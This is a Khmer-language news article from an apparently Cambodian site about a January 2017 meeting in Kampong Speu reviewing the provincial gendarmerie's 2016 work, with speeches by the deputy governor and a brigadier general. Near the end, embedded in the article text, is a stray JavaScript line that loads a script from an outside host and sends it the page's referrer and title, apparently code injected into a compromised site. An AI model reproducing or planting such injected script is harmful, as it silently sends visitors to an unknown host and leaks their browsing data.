ព្រឹតិ្តការណ៍ថ្មីៗ

លោកឧត្តមសេនីយ៏ត្រី ជូ សារុន បើទោៈបី ភារកិច្ច និងការងារក្នុងឆ្នាំចាស់ទទួលបានជោគជ័យក្នុងកិច្ចការ បង្ការ បង្ក្រាប សង្គ្រោៈ តែកម្លាំងអាវុធហត្ថមិនដេកលក់ទេ គឺមានភារកិច្ចផ្សេងត្រូវអនុវត្ត

2 ឆ្នាំ មុន 1 តូ សុផល

 កំពង់ស្ពឺ៖ ឯកឧត្តម សរ សុពុត្រា អភិបាលរងខេត្តជាដំណាងដ៏ខ្ពង់ខ្ពស់ របស់ឯកឧត្តម វ៉ី សំណាង អភិបាលខេត្តកំពង់ស្ពឺ បានអញ្ជើញចូលក្នុងអង្គប្រជុំត្រួតពិនិត្យអនុវត្តតួនាទី ភារកិច្ចនិងការងាររបស់កងរាជអាវុធហត្ថខេត្តកំពង់ស្ពឺនៅរសៀលថ្ងៃទី ១៥ ខែមករា ឆ្នាំ០១៧ដែលមានការចូលរួមពី តំណាងស្ថាបន័តុលាការខេត្ត ឧត្តមសេនីយ៏ត្រីមេញ្ជាការ លោកឧត្តមសេនីយ៏ត្រីស្នងការនគរបាលខេត្ត អភិបាលក្រុង ស្រុក នាយអាវុធហត្ថទាំងអស់ចំនួន ៩៨នាក់ ។ លោកឧត្តមសេនីយ៏ត្រី ជូ សារុន បានលើកឡើងអំពីការងារឆ្នាំ២០១៦កន្លងទៅថាជាការពិតកម្លាំងកងរាជអាវុធហត្ថបានបំពេញការងារការពារសន្តិសុខ និងសុវត្តិភាពជូនបងប្អូនប្រជាពលរដ្ឋ ជារាល់ថ្ងៃដោយមិនខ្លាចការនឿយហត់ ហើតការបំពេញតួនាទីប្រកបដោយភាពសុក្រិត ថ្លៃថ្នូរ ម៉ឺងម៉ាត់ ក្នុងឋានៈតួនាទីជាយោធាច្បាប់ ជាមន្ត្រីអនុវត្តច្បាប់ បានធ្វើឲ្យកងកម្លាំងអាវុធហត្ថយើងមានការជឿជាក់ ទុកចិត្តពីសំណាក់ បងប្អូនប្រជាពលរដ្ឋ រួមទាំងថ្នាក់ដឹកនាំលើការងារ ការពារសន្តិសុខ សណ្តាប់ធ្នាប់សាធារណៈជាពិសេសបើទោៈបីក្នុងមូលដ្ឋានមានសុខសុវត្តិភាព១០០%មែនតែកម្លាំងរបស់អង្គភាពមិនបានដេកលក់នោៈដែរ ពោលគឺមានការងារជាច្រើនចំពោៈមុខសម្រាប់អនុវត្តបន្តផងដែរ ។ ឯកឧត្តម សរ សុពុត្រា អភិបាលរងខេត្តកំពង់ស្ពឺបានលើកឡើងដោយបង្ហាញនៅកាយវិការ ជឿជាក់ទុកចិត្តមកកម្លាំងដ៏មុតស្រួចរបស់អាវុធហត្ថថា បើទោៈអាវុធហត្ថមានកម្លាំងតិចនៅក្នុងការងារសម្រាប់ប្រត្តិបត្តិការណ៏ផ្សេងៗ តែអាវុហត្ថបានបំពេញតួនាទីយ៉ាស្វាហាប់ក្នុងការប្រយុទ្ធប្រឆាំងអំពើល្មើសច្បាប់នានាក្នុងតំបន់បានយ៉ាងប្រសើរ ។

ឯកឧត្តមអភិបាលរងបានលើកឡើងបន្តថា អាវុធហត្ថយើងមានការមមាញឹកច្រើន ដោយដៃម្ខាងធ្វើការងារ បង្ការ បង្ក្រាប សង្គ្រោៈ ឯដៃម្ខាងទៀតដោៈស្រាយការងារ សាងសង់ហេដ្ឋារចនាសម្ព័ន្ធ ជំរំជំរកស្នាក់នៅ ហើយមួយរយៈនេៈមិនថាតែនៅទីបញ្ជាការដ្ឋានកងរាជអាវុធហត្ថខេត្តទេ នៅតាមបណ្តាមូលដ្ឋានក្រុង ស្រុក ស្នាការសន្តិសុខ នានាពិជាមានការអភិវឌ្ឍន៏យ៉ាងប្រសើរ ។ ជាការពិតណាស់យើងជាកងកម្លាំងកាលណាប្រទេសមានសន្តិភាពពេញ ត្រូវធ្វើការងារដើរទន្ទឹមគ្នារវាងការងារ បង្ការ បង្ក្រាប សង្គ្រោៈនិងការអភិវឌ្ឍន៏ឲ្យស្របទៅតាមប្រទេសដែលកំពង់អភិវឌ្ឍន៏របស់យើង ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!